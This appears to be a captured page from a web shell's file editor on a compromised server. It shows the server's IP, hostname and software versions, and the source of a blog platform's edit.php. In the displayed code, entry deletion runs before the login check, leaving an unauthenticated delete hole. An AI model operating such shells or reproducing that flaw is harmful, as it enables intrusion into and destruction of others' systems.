One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
compmath
/
public_html
/
Edit File:
edit.php
<?php /* Drukkar, a small blogging platform Copyright (C) 2011-2012 Danyil Bohdan This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ header('Content-type: text/html; charset=utf-8'); session_start(); if (!isset($_SESSION['initiated'])) { // This helps prevent session fixation attacks session_regenerate_id(true); $_SESSION['initiated'] = true; } include("inc/config.php"); include("inc/lib.php"); $me = $blog_base_location . "edit.php"; // Mostly-HTML header include("inc/header.php"); echo '<tr><td id="content">'; $form_post = array('password', 'title', 'date', 'date_backup', 'tags', 'format', 'files', 'translit', 'submit', 'text'); $form_get = array('file'); process_form($form_post, $_POST); process_form($form_get, $_GET); $form_post['date_backup'] = htmlspecialchars($form_post['date_backup']); $file_to_edit = basename(htmlspecialchars($form_get['file'])); if ((hash_with_salt($form_post['password'], $blog_salt) === $blog_password) && !isset($_SESSION['is_logged_in'])) { session_regenerate_id(true); $_SESSION['is_logged_in'] = true; $_SESSION['created'] = time(); } if (array_key_exists('logout', $_GET)) { session_unset(); session_destroy(); } if (isset($_SESSION['last_activity']) && time() - $_SESSION['last_activity'] > $blog_session_length) { // Expire user's session after a period of inactivity session_unset(); session_destroy(); echo "$loc_session_expired"; } if ($form_post['submit'] === $loc_delete) { unlink($blog_entries_dir . $file_to_edit); $file_to_edit = ""; // Go back to the entry list after deletion } if (isset($_SESSION['is_logged_in'])) { $_SESSION['last_activity'] = time(); if (time() - $_SESSION['created'] > 300) { // Change session ID every 5 minutes session_regenerate_id(true); $_SESSION['created'] = time(); } echo "<p><a id=\"logout\" href=\"$me?logout\">$loc_log_out</a></p>"; if (!$file_to_edit) { // If no file has been specified we list all entries the user can edit echo "<p><a href=\"$me?file=" . date($blog_file_name_format) . ".xml\">$loc_new</a></p>"; foreach (array_reverse(glob($blog_entries_dir . "*.xml")) as $file) { $entry = entry_load($file); echo "<a href=\"$me?file=" . basename($file) . "\"> " . date($blog_date_format, (int) $entry->date) . " " . ((string) $entry->format === "html" ? $entry->title : htmlspecialchars($entry->title)) . "</a><br>"; } } else { $entry_exists = file_exists($blog_entries_dir . $file_to_edit); echo "<form name=\"form\" action=\"$me?file=" . $file_to_edit . "\" method=\"post\" enctype=\"multipart/form-data\">"; echo "<p><a href=\"$me\">$loc_back</a></p>"; if ((string) $form_post['submit'] === $loc_save) { // Save the form that the user submitted to a file $uploaded_files = process_uploaded_files($_FILES, $form_post['translit'], $blog_files_dir); if (entry_save($blog_entries_dir . $file_to_edit, $form_post['format'], $form_post['title'], $form_post['text'], list_to_xml($form_post['tags'], "<tag>", "</tag>"), list_to_xml($form_post['files'], "<file>", "</file>") . $uploaded_files, $form_post['date'], $form_post['date_backup'])) { echo $loc_edit_saved; $entry_exists = True; } else { echo "<span class=\"error\">$loc_saving_failed</span><br>"; } } if ($entry_exists) { echo "<p><a href=\"" . $blog_base_location . "index.php?post=" . basename($file_to_edit, ".xml") . "\" target=\"_blank\">$loc_view_entry</a></p>"; } // Display the selected blog entry if ($entry_exists) { $entry = entry_load($blog_entries_dir . $file_to_edit); $entry->format = htmlspecialchars($entry->format); } else { $entry = entry_new(); } $new_entry = !$entry_exists; echo "<p>$loc_format<br><input type=\"radio\" name=\"format\" value=\"html\" " . ((string) $entry->format === "html" ? "checked" : "") . "> $loc_html <input type=\"radio\" name=\"format\" value=\"plain\" " . ($entry->format != "html" ? "checked" : "") . "> $loc_plain</p> <p>$loc_title<br><input type=\"text\" size=60 name=\"title\" value=\"" . htmlspecialchars($entry->title) . "\"></p> <p>$loc_text<br><textarea rows=15 cols=60 name=\"text\">" . htmlspecialchars($entry->text) . "</textarea></p>"; echo "<p>$loc_tags<br><textarea rows=10 cols=20 name=\"tags\">"; if ($entry) { // Write out the in the appropriate text area. foreach ($entry->tag as $key => $value) { echo htmlspecialchars($value) . "\n"; } } echo "</textarea></p>"; echo "<p>$loc_files<br><textarea rows=10 cols=60 name=\"files\">"; if ($entry) foreach ($entry->file as $key => $value) echo htmlspecialchars($value) . "\n"; echo "</textarea></p>"; $time = time(); // Storing UNIX time in a variable prevents different results each time we need current time below. if (!$blog_entry_date_from_file_name) { var_dump($entry->old_date); if (isset($entry->old_date)) echo "<input type=\"hidden\" name=\"date\" value=\"" . date($blog_date_format, (int) $entry->old_date) . "\">"; } else { echo "<p>$loc_date<br><input type=\"text\" size=20 name=\"date\" value=\"" . date($blog_date_format, ($new_entry ? $time : (int) $entry->date)) . "\"><input type=\"hidden\" name=\"date_backup\" value=\"" . date($blog_date_format, ($new_entry ? $time : (int) $entry->date)) . "\"></p>"; } echo "<p>$loc_upload<br><input type=\"file\" name=\"file1\"><br><input type=\"file\" name=\"file2\"><br><input type=\"file\" name=\"file3\"></p> <p>$loc_translit<br><input type=\"radio\" name=\"translit\" value=\"russian\"> $loc_russian <input type=\"radio\" name=\"translit\" value=\"ukrainian\" checked> $loc_ukrainian</p> <p><input type=\"submit\" name=\"submit\" value=\"$loc_save\"> <input type=\"submit\" name=\"submit\" value=\"$loc_delete\" onClick=\"javascript:return confirm('$loc_delete_prompt_entry');\"></p> </form>"; } } else { echo "<form name=\"form\" action=\"$me\" method=\"post\" enctype=\"multipart/form-data\">"; echo "<p>$loc_password<br><input type=\"password\" name=\"password\" value=\"\"></p>"; echo "<p><input type=\"submit\" name=\"submit\" value=\"$loc_log_in\"></p></form>"; } echo '</td></tr>'; // Mostly-HTML footer include("inc/footer.php") ?>
Simpan